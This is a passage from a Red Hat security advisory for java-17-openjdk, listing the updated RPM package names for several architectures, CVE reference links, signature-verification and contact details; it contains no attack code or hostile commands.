java-17-openjdk-devel-fastdebug-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-devel-fastdebug-debuginfo-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-devel-slowdebug-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-fastdebug-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-fastdebug-debuginfo-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-headless-debuginfo-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-headless-fastdebug-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-headless-fastdebug-debuginfo-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-headless-slowdebug-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-jmods-fastdebug-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-jmods-slowdebug-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-slowdebug-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-src-fastdebug-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-src-slowdebug-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-static-libs-fastdebug-17.0.6.0.10-2.el8_6.aarch64.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.6.0.10-2.el8_6.aarch64.rpm

ppc64le:  
java-17-openjdk-debuginfo-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-debugsource-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-demo-fastdebug-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-demo-slowdebug-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-devel-debuginfo-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-devel-fastdebug-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-devel-fastdebug-debuginfo-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-devel-slowdebug-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-fastdebug-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-fastdebug-debuginfo-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-headless-debuginfo-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-headless-fastdebug-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-headless-fastdebug-debuginfo-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-headless-slowdebug-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-jmods-fastdebug-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-jmods-slowdebug-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-slowdebug-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-src-fastdebug-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-src-slowdebug-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-static-libs-fastdebug-17.0.6.0.10-2.el8_6.ppc64le.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.6.0.10-2.el8_6.ppc64le.rpm

s390x:  
java-17-openjdk-debuginfo-17.0.6.0.10-2.el8_6.s390x.rpm  
java-17-openjdk-debugsource-17.0.6.0.10-2.el8_6.s390x.rpm  
java-17-openjdk-demo-slowdebug-17.0.6.0.10-2.el8_6.s390x.rpm  
java-17-openjdk-devel-debuginfo-17.0.6.0.10-2.el8_6.s390x.rpm  
java-17-openjdk-devel-slowdebug-17.0.6.0.10-2.el8_6.s390x.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.6.0.10-2.el8_6.s390x.rpm  
java-17-openjdk-headless-debuginfo-17.0.6.0.10-2.el8_6.s390x.rpm  
java-17-openjdk-headless-slowdebug-17.0.6.0.10-2.el8_6.s390x.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.6.0.10-2.el8_6.s390x.rpm  
java-17-openjdk-jmods-slowdebug-17.0.6.0.10-2.el8_6.s390x.rpm  
java-17-openjdk-slowdebug-17.0.6.0.10-2.el8_6.s390x.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.6.0.10-2.el8_6.s390x.rpm  
java-17-openjdk-src-slowdebug-17.0.6.0.10-2.el8_6.s390x.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.6.0.10-2.el8_6.s390x.rpm

x86_64:  
java-17-openjdk-debuginfo-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-debugsource-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-demo-fastdebug-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-demo-slowdebug-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-devel-debuginfo-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-devel-fastdebug-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-devel-fastdebug-debuginfo-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-devel-slowdebug-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-fastdebug-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-fastdebug-debuginfo-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-headless-debuginfo-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-headless-fastdebug-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-headless-fastdebug-debuginfo-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-headless-slowdebug-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-jmods-fastdebug-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-jmods-slowdebug-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-slowdebug-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-src-fastdebug-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-src-slowdebug-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-static-libs-fastdebug-17.0.6.0.10-2.el8_6.x86_64.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.6.0.10-2.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-21835  
https://access.redhat.com/security/cve/CVE-2023-21843  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#ssl